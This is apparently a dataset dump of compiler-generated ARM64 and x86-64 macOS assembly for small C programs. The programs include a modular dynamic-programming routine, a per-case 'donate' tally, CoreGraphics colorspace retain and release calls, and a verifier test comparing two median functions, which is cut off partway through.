ldrsw x15, [sp, #24]
adrp x17, _main.p3@PAGE
add x17, x17, _main.p3@PAGEOFF
ldr x15, [x17, x15, lsl #3]
mul x14, x14, x15
sdiv x10, x10, x14
ldur w14, [x29, #-16]
subs w14, w14, #1
subs x10, x10, w14, sxtw
mul x8, x8, x10
sdiv x10, x8, x13
mul x10, x10, x13
subs x8, x8, x10
ldur w10, [x29, #-16]
subs w10, w10, #1
mov x15, x9
mov w14, #504
smaddl x15, w10, w14, x15
ldur w10, [x29, #-20]
add w10, w10, #1
mov w14, #24
smaddl x10, w10, w14, x15
ldrsw x14, [sp, #24]
ldr x10, [x10, x14, lsl #3]
ldursw x14, [x29, #-8]
ldursw x15, [x29, #-20]
ldr x15, [x16, x15, lsl #3]
ldrsw x0, [sp, #24]
ldr x0, [x17, x0, lsl #3]
mul x15, x15, x0
sdiv x14, x14, x15
ldursw x15, [x29, #-8]
ldur w0, [x29, #-20]
add w0, w0, #1
ldr x0, [x16, w0, sxtw #3]
ldrsw x1, [sp, #24]
ldr x1, [x17, x1, lsl #3]
mul x0, x0, x1
sdiv x15, x15, x0
subs x14, x14, x15
mul x10, x10, x14
sdiv x14, x10, x13
mul x14, x14, x13
subs x10, x10, x14
add x8, x8, x10
ldur w10, [x29, #-16]
subs w10, w10, #1
mov x15, x9
mov w14, #504
smaddl x10, w10, w14, x15
ldursw x14, [x29, #-20]
mul x14, x14, x11
add x10, x10, x14
ldr w14, [sp, #24]
add w14, w14, #1
ldr x10, [x10, w14, sxtw #3]
ldursw x14, [x29, #-8]
ldursw x15, [x29, #-20]
ldr x15, [x16, x15, lsl #3]
ldrsw x0, [sp, #24]
ldr x0, [x17, x0, lsl #3]
mul x15, x15, x0
sdiv x14, x14, x15
ldursw x15, [x29, #-8]
ldursw x0, [x29, #-20]
ldr x16, [x16, x0, lsl #3]
ldr w0, [sp, #24]
add w0, w0, #1
ldr x17, [x17, w0, sxtw #3]
mul x16, x16, x17
sdiv x15, x15, x16
subs x14, x14, x15
mul x10, x10, x14
sdiv x14, x10, x13
mul x14, x14, x13
subs x10, x10, x14
add x8, x8, x10
sdiv x10, x8, x13
mul x10, x10, x13
subs x8, x8, x10
ldursw x10, [x29, #-16]
mul x10, x10, x12
add x9, x9, x10
ldursw x10, [x29, #-20]
mul x10, x10, x11
add x9, x9, x10
ldrsw x10, [sp, #24]
str x8, [x9, x10, lsl #3]
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_19 Depth=3
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB0_19
LBB0_22: ; in Loop: Header=BB0_17 Depth=2
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_17 Depth=2
ldur w8, [x29, #-20]
add w8, w8, #1
stur w8, [x29, #-20]
b LBB0_17
LBB0_24: ; in Loop: Header=BB0_15 Depth=1
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_15 Depth=1
ldur w8, [x29, #-16]
add w8, w8, #1
stur w8, [x29, #-16]
b LBB0_15
LBB0_26:
ldursw x8, [x29, #-8]
mov x9, #504
mul x9, x8, x9
adrp x8, _main.f@PAGE
add x8, x8, _main.f@PAGEOFF
ldr x8, [x8, x9]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w0, #0
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.zerofill __DATA,__bss,_main.p2,8000072,3 ; @main.p2
.zerofill __DATA,__bss,_main.p3,8000072,3 ; @main.p3
.zerofill __DATA,__bss,_main.f,504004536,3 ; @main.f
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "%lld\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movl $0, -4(%rbp)
leaq L_.str(%rip), %rdi
leaq -8(%rbp), %rsi
movb $0, %al
callq _scanf
movq $1, _main.p2(%rip)
movl $1, -16(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
cmpl $1000009, -16(%rbp) ## imm = 0xF4249
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -16(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.p2(%rip), %rax
movq (%rax,%rcx,8), %rax
shlq $1, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movslq -16(%rbp), %rcx
leaq _main.p2(%rip), %rax
movq %rdx, (%rax,%rcx,8)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_1
LBB0_4:
movq $1, _main.p3(%rip)
movl $1, -16(%rbp)
LBB0_5: ## =>This Inner Loop Header: Depth=1
cmpl $1000009, -16(%rbp) ## imm = 0xF4249
jge LBB0_8
## %bb.6: ## in Loop: Header=BB0_5 Depth=1
movl -16(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.p3(%rip), %rax
imulq $3, (%rax,%rcx,8), %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movslq -16(%rbp), %rcx
leaq _main.p3(%rip), %rax
movq %rdx, (%rax,%rcx,8)
## %bb.7: ## in Loop: Header=BB0_5 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_5
LBB0_8:
movl $0, -12(%rbp)
LBB0_9: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %ecx
movl $1, %eax
## kill: def $cl killed $ecx
shll %cl, %eax
cmpl -8(%rbp), %eax
jg LBB0_12
## %bb.10: ## in Loop: Header=BB0_9 Depth=1
jmp LBB0_11
LBB0_11: ## in Loop: Header=BB0_9 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_9
LBB0_12:
movl -12(%rbp), %eax
addl $-1, %eax
movl %eax, -12(%rbp)
movslq -12(%rbp), %rcx
leaq _main.f(%rip), %rax
addq $504, %rax ## imm = 0x1F8
imulq $24, %rcx, %rcx
addq %rcx, %rax
movq $1, (%rax)
movl -12(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.p2(%rip), %rax
imulq $3, (%rax,%rcx,8), %rax
movslq -8(%rbp), %rcx
cmpq %rcx, %rax
jg LBB0_14
## %bb.13:
movl -12(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.f(%rip), %rax
addq $504, %rax ## imm = 0x1F8
imulq $24, %rcx, %rcx
addq %rcx, %rax
movq $1, 8(%rax)
LBB0_14:
movl $2, -16(%rbp)
LBB0_15: ## =>This Loop Header: Depth=1
## Child Loop BB0_17 Depth 2
## Child Loop BB0_19 Depth 3
movl -16(%rbp), %eax
cmpl -8(%rbp), %eax
jg LBB0_26
## %bb.16: ## in Loop: Header=BB0_15 Depth=1
movl $0, -20(%rbp)
LBB0_17: ## Parent Loop BB0_15 Depth=1
## => This Loop Header: Depth=2
## Child Loop BB0_19 Depth 3
movl -20(%rbp), %eax
cmpl -12(%rbp), %eax
jg LBB0_24
## %bb.18: ## in Loop: Header=BB0_17 Depth=2
movl $0, -24(%rbp)
LBB0_19: ## Parent Loop BB0_15 Depth=1
## Parent Loop BB0_17 Depth=2
## => This Inner Loop Header: Depth=3
cmpl $2, -24(%rbp)
jge LBB0_22
## %bb.20: ## in Loop: Header=BB0_19 Depth=3
movl -16(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.f(%rip), %rax
imulq $504, %rcx, %rcx ## imm = 0x1F8
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $24, %rcx, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -64(%rbp) ## 8-byte Spill
movslq -8(%rbp), %rax
movslq -20(%rbp), %rdx
leaq _main.p2(%rip), %rcx
movq (%rcx,%rdx,8), %rcx
movslq -24(%rbp), %rsi
leaq _main.p3(%rip), %rdx
imulq (%rdx,%rsi,8), %rcx
cqto
idivq %rcx
movq %rax, %rcx
movq -64(%rbp), %rax ## 8-byte Reload
movl -16(%rbp), %edx
subl $1, %edx
movslq %edx, %rdx
subq %rdx, %rcx
imulq %rcx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movq %rdx, -48(%rbp) ## 8-byte Spill
movl -16(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.f(%rip), %rax
imulq $504, %rcx, %rcx ## imm = 0x1F8
addq %rcx, %rax
movl -20(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
imulq $24, %rcx, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -56(%rbp) ## 8-byte Spill
movslq -8(%rbp), %rax
movslq -20(%rbp), %rdx
leaq _main.p2(%rip), %rcx
movq (%rcx,%rdx,8), %rcx
movslq -24(%rbp), %rsi
leaq _main.p3(%rip), %rdx
imulq (%rdx,%rsi,8), %rcx
cqto
idivq %rcx
movq %rax, %rcx
movslq -8(%rbp), %rax
movl -20(%rbp), %edx
addl $1, %edx
movslq %edx, %rsi
leaq _main.p2(%rip), %rdx
movq (%rdx,%rsi,8), %rsi
movslq -24(%rbp), %rdi
leaq _main.p3(%rip), %rdx
imulq (%rdx,%rdi,8), %rsi
cqto
idivq %rsi
movq %rax, %rdx
movq -56(%rbp), %rax ## 8-byte Reload
subq %rdx, %rcx
imulq %rcx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movq %rdx, %rax
movq -48(%rbp), %rdx ## 8-byte Reload
addq %rax, %rdx
movq %rdx, -32(%rbp) ## 8-byte Spill
movl -16(%rbp), %eax
subl $1, %eax
movslq %eax, %rcx
leaq _main.f(%rip), %rax
imulq $504, %rcx, %rcx ## imm = 0x1F8
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $24, %rcx, %rcx
addq %rcx, %rax
movl -24(%rbp), %ecx
addl $1, %ecx
movslq %ecx, %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -40(%rbp) ## 8-byte Spill
movslq -8(%rbp), %rax
movslq -20(%rbp), %rdx
leaq _main.p2(%rip), %rcx
movq (%rcx,%rdx,8), %rcx
movslq -24(%rbp), %rsi
leaq _main.p3(%rip), %rdx
imulq (%rdx,%rsi,8), %rcx
cqto
idivq %rcx
movq %rax, %rcx
movslq -8(%rbp), %rax
movslq -20(%rbp), %rsi
leaq _main.p2(%rip), %rdx
movq (%rdx,%rsi,8), %rsi
movl -24(%rbp), %edx
addl $1, %edx
movslq %edx, %rdi
leaq _main.p3(%rip), %rdx
imulq (%rdx,%rdi,8), %rsi
cqto
idivq %rsi
movq %rax, %rdx
movq -40(%rbp), %rax ## 8-byte Reload
subq %rdx, %rcx
imulq %rcx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movq -32(%rbp), %rax ## 8-byte Reload
addq %rdx, %rax
movl $1000000007, %ecx ## imm = 0x3B9ACA07
cqto
idivq %rcx
movslq -16(%rbp), %rcx
leaq _main.f(%rip), %rax
imulq $504, %rcx, %rcx ## imm = 0x1F8
addq %rcx, %rax
movslq -20(%rbp), %rcx
imulq $24, %rcx, %rcx
addq %rcx, %rax
movslq -24(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
## %bb.21: ## in Loop: Header=BB0_19 Depth=3
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB0_19
LBB0_22: ## in Loop: Header=BB0_17 Depth=2
jmp LBB0_23
LBB0_23: ## in Loop: Header=BB0_17 Depth=2
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB0_17
LBB0_24: ## in Loop: Header=BB0_15 Depth=1
jmp LBB0_25
LBB0_25: ## in Loop: Header=BB0_15 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_15
LBB0_26:
movslq -8(%rbp), %rcx
leaq _main.f(%rip), %rax
imulq $504, %rcx, %rcx ## imm = 0x1F8
addq %rcx, %rax
movq (%rax), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
xorl %eax, %eax
addq $64, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.zerofill __DATA,__bss,_main.p2,8000072,4 ## @main.p2
.zerofill __DATA,__bss,_main.p3,8000072,4 ## @main.p3
.zerofill __DATA,__bss,_main.f,504004536,4 ## @main.f
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "%lld\n"
.subsections_via_symbols
| the_stack_data/92328308.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur wzr, [x29, #-28]
mov x9, sp
sub x8, x29, #32
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
mov w8, #1
str w8, [sp, #28]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
ldr w8, [sp, #28]
ldur w9, [x29, #-32]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_11
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
mov x9, sp
add x8, sp, #32
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
str wzr, [sp, #36]
ldr w9, [sp, #28]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
mov w8, #1
stur w8, [x29, #-36]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldur w8, [x29, #-36]
ldr w9, [sp, #32]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_9
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
mov x9, sp
sub x8, x29, #23
str x8, [sp, #16] ; 8-byte Folded Spill
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
ldr x0, [sp, #16] ; 8-byte Folded Reload
adrp x1, l_.str.3@PAGE
add x1, x1, l_.str.3@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
mov x9, sp
add x8, sp, #40
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
ldr w9, [sp, #40]
ldr w8, [sp, #36]
add w8, w8, w9
str w8, [sp, #36]
b LBB0_7
LBB0_6: ; in Loop: Header=BB0_3 Depth=2
ldr w9, [sp, #36]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _printf
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_3 Depth=2
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_3 Depth=2
ldur w8, [x29, #-36]
add w8, w8, #1
stur w8, [x29, #-36]
b LBB0_3
LBB0_9: ; in Loop: Header=BB0_1 Depth=1
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #28]
add w8, w8, #1
str w8, [sp, #28]
b LBB0_1
LBB0_11:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_13
b LBB0_12
LBB0_12:
bl ___stack_chk_fail
LBB0_13:
mov w0, #0
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "Case %d:\n"
l_.str.2: ; @.str.2
.asciz "%s"
l_.str.3: ; @.str.3
.asciz "donate"
l_.str.4: ; @.str.4
.asciz "%d\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -28(%rbp)
leaq L_.str(%rip), %rdi
leaq -32(%rbp), %rsi
movb $0, %al
callq _scanf
movl $1, -52(%rbp)
LBB0_1: ## =>This Loop Header: Depth=1
## Child Loop BB0_3 Depth 2
movl -52(%rbp), %eax
cmpl -32(%rbp), %eax
jg LBB0_11
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
leaq L_.str(%rip), %rdi
leaq -48(%rbp), %rsi
movb $0, %al
callq _scanf
movl $0, -44(%rbp)
movl -52(%rbp), %esi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -36(%rbp)
LBB0_3: ## Parent Loop BB0_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -36(%rbp), %eax
cmpl -48(%rbp), %eax
jg LBB0_9
## %bb.4: ## in Loop: Header=BB0_3 Depth=2
leaq -23(%rbp), %rsi
leaq L_.str.2(%rip), %rdi
movb $0, %al
callq _scanf
leaq -23(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _strcmp
cmpl $0, %eax
jne LBB0_6
## %bb.5: ## in Loop: Header=BB0_3 Depth=2
leaq L_.str(%rip), %rdi
leaq -40(%rbp), %rsi
movb $0, %al
callq _scanf
movl -40(%rbp), %eax
addl -44(%rbp), %eax
movl %eax, -44(%rbp)
jmp LBB0_7
LBB0_6: ## in Loop: Header=BB0_3 Depth=2
movl -44(%rbp), %esi
leaq L_.str.4(%rip), %rdi
movb $0, %al
callq _printf
LBB0_7: ## in Loop: Header=BB0_3 Depth=2
jmp LBB0_8
LBB0_8: ## in Loop: Header=BB0_3 Depth=2
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_3
LBB0_9: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_10
LBB0_10: ## in Loop: Header=BB0_1 Depth=1
movl -52(%rbp), %eax
addl $1, %eax
movl %eax, -52(%rbp)
jmp LBB0_1
LBB0_11:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_13
## %bb.12:
xorl %eax, %eax
addq $64, %rsp
popq %rbp
retq
LBB0_13:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "Case %d:\n"
L_.str.2: ## @.str.2
.asciz "%s"
L_.str.3: ## @.str.3
.asciz "donate"
L_.str.4: ## @.str.4
.asciz "%d\n"
.subsections_via_symbols
| the_stack_data/531247.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _f ; -- Begin function f
.p2align 2
_f: ; @f
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl _CGColorSpaceCreateDeviceRGB
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _CGColorSpaceRetain
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _fb ; -- Begin function fb
.p2align 2
_fb: ; @fb
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
bl _CGColorSpaceCreateDeviceRGB
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _CGColorSpaceRetain
ldr x0, [sp, #8]
bl _CGColorSpaceRelease
ldr x0, [sp, #8]
bl _CGColorSpaceRelease
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _f ## -- Begin function f
.p2align 4, 0x90
_f: ## @f
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
callq _CGColorSpaceCreateDeviceRGB
movq %rax, -8(%rbp)
movq -8(%rbp), %rdi
callq _CGColorSpaceRetain
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _fb ## -- Begin function fb
.p2align 4, 0x90
_fb: ## @fb
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
callq _CGColorSpaceCreateDeviceRGB
movq %rax, -8(%rbp)
movq -8(%rbp), %rdi
callq _CGColorSpaceRetain
movq -8(%rbp), %rdi
callq _CGColorSpaceRelease
movq -8(%rbp), %rdi
callq _CGColorSpaceRelease
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/51701563.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl ___VERIFIER_assert ; -- Begin function __VERIFIER_assert
.p2align 2
___VERIFIER_assert: ; @__VERIFIER_assert
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur w0, [x29, #-4]
ldur w8, [x29, #-4]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_3
b LBB0_1
LBB0_1:
b LBB0_2
LBB0_2:
bl ___VERIFIER_error
b LBB0_3
LBB0_3:
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #4] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
bl ___VERIFIER_nondet_int
stur w0, [x29, #-8]
bl ___VERIFIER_nondet_int
stur w0, [x29, #-12]
bl ___VERIFIER_nondet_int
str w0, [sp, #16]
ldur w0, [x29, #-8]
ldur w1, [x29, #-12]
ldr w2, [sp, #16]
bl _worngMid
str w0, [sp, #12]
ldur w0, [x29, #-8]
ldur w1, [x29, #-12]
ldr w2, [sp, #16]
bl _correctMid
str w0, [sp, #8]
ldr w8, [sp, #12]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, eq
and w0, w8, #0x1
bl ___VERIFIER_assert
ldr w0, [sp, #4] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _worngMid ; -- Begin function worngMid
.p2align 2
_worngMid: ; @worngMid
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
str w1, [sp, #8]
str w2, [sp, #4]
ldr w8, [sp, #4]
str w8, [sp]
ldr w8, [sp, #8]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_7
b LBB2_1
LBB2_1:
ldr w8, [sp, #12]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_3
b LBB2_2
LBB2_2:
ldr w8, [sp, #8]
str w8, [sp]
b LBB2_6
LBB2_3:
ldr w8, [sp, #12]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_5
b LBB2_4
LBB2_4:
ldr w8, [sp, #8]
str w8, [sp]
b LBB2_5
LBB2_5:
b LBB2_6
LBB2_6:
b LBB2_13
LBB2_7:
ldr w8, [sp, #12]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB2_9
b LBB2_8
LBB2_8:
ldr w8, [sp, #8]
str w8, [sp]
b LBB2_12
LBB2_9:
ldr w8, [sp, #12]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB2_11
b LBB2_10
LBB2_10:
ldr w8, [sp, #12]
str w8, [sp]
b LBB2_11
LBB2_11:
b LBB2_12
LBB2_12:
b LBB2_13
LBB2_13:
ldr w0, [sp]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _correctMid ; -- Begin function correctMid
.p2align 2
_correctMid: ; @correctMid
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
str w1, [sp, #8]
str w2, [sp, #4]
ldr w8, [sp, #4]
str w8, [sp]
ldr w8, [sp, #8]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_7
b LBB3_1
LBB3_1:
ldr w8, [sp, #12]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_3
b LBB3_2
LBB3_2:
ldr w8, [sp, #8]
str w8, [sp]
b LBB3_6
LBB3_3:
ldr w8, [sp, #12]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB3_5
b LBB3_4
LBB3_4:
ldr w8, [sp, #12]
str w8, [sp]
b LBB3_5
LBB3_5:
b LBB3_6
LBB3_6:
b LBB3_13
LBB3_7:
ldr w8, [sp, #12]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB3_9
b LBB3_8
LBB3_8:
ldr w8, [sp, #8]
str w8, [sp]
b LBB3_12
LBB3_9:
ldr w8, [sp, #12]
ldr w9, [sp, #4]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB3_11
b LBB3_10
LBB3_10:
ldr w8, [sp, #12]
str w8, [sp]
b LBB3_11
LBB3_11:
b LBB3_12
LBB3_12:
b LBB3_13
LBB3_13:
ldr w0, [sp]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl ___VERIFIER_assert ## -- Begin function __VERIFIER_assert
.p2align 4, 0x90
___VERIFIER_assert: ## @__VERIFIER_assert
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
cmpl $0, -4(%rbp)
jne LBB0_3
## %bb.1:
jmp LBB0_2
LBB0_2:
movb $0, %al
callq ___VERIFIER_error
LBB0_3:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movb $0, %al
callq ___VERIFIER_nondet_int
movl %eax, -8(%rbp)
movb $0, %al
callq ___VERIFIER_nondet_int
movl %eax, -12(%rbp)
movb $0, %al
callq ___VERIFIER_nondet_int
movl %eax, -16(%rbp)
movl -8(%rbp), %edi
movl -12(%rbp), %esi
movl -16(%rbp), %edx
callq _worngMid
movl %eax, -20(%rbp)
movl -8(%rbp), %edi
movl -12(%rbp), %esi
movl -16(%rbp), %edx
callq _correctMid
movl %eax, -24(%rbp)
movl -20(%rbp), %eax
cmpl -24(%rbp), %eax
sete %al
andb $1, %al
movzbl %al, %edi
callq ___VERIFIER_assert
xorl %eax, %eax
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _worngMid ## -- Begin function worngMid
.p2align 4, 0x90
_worngMid: ## @worngMid
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
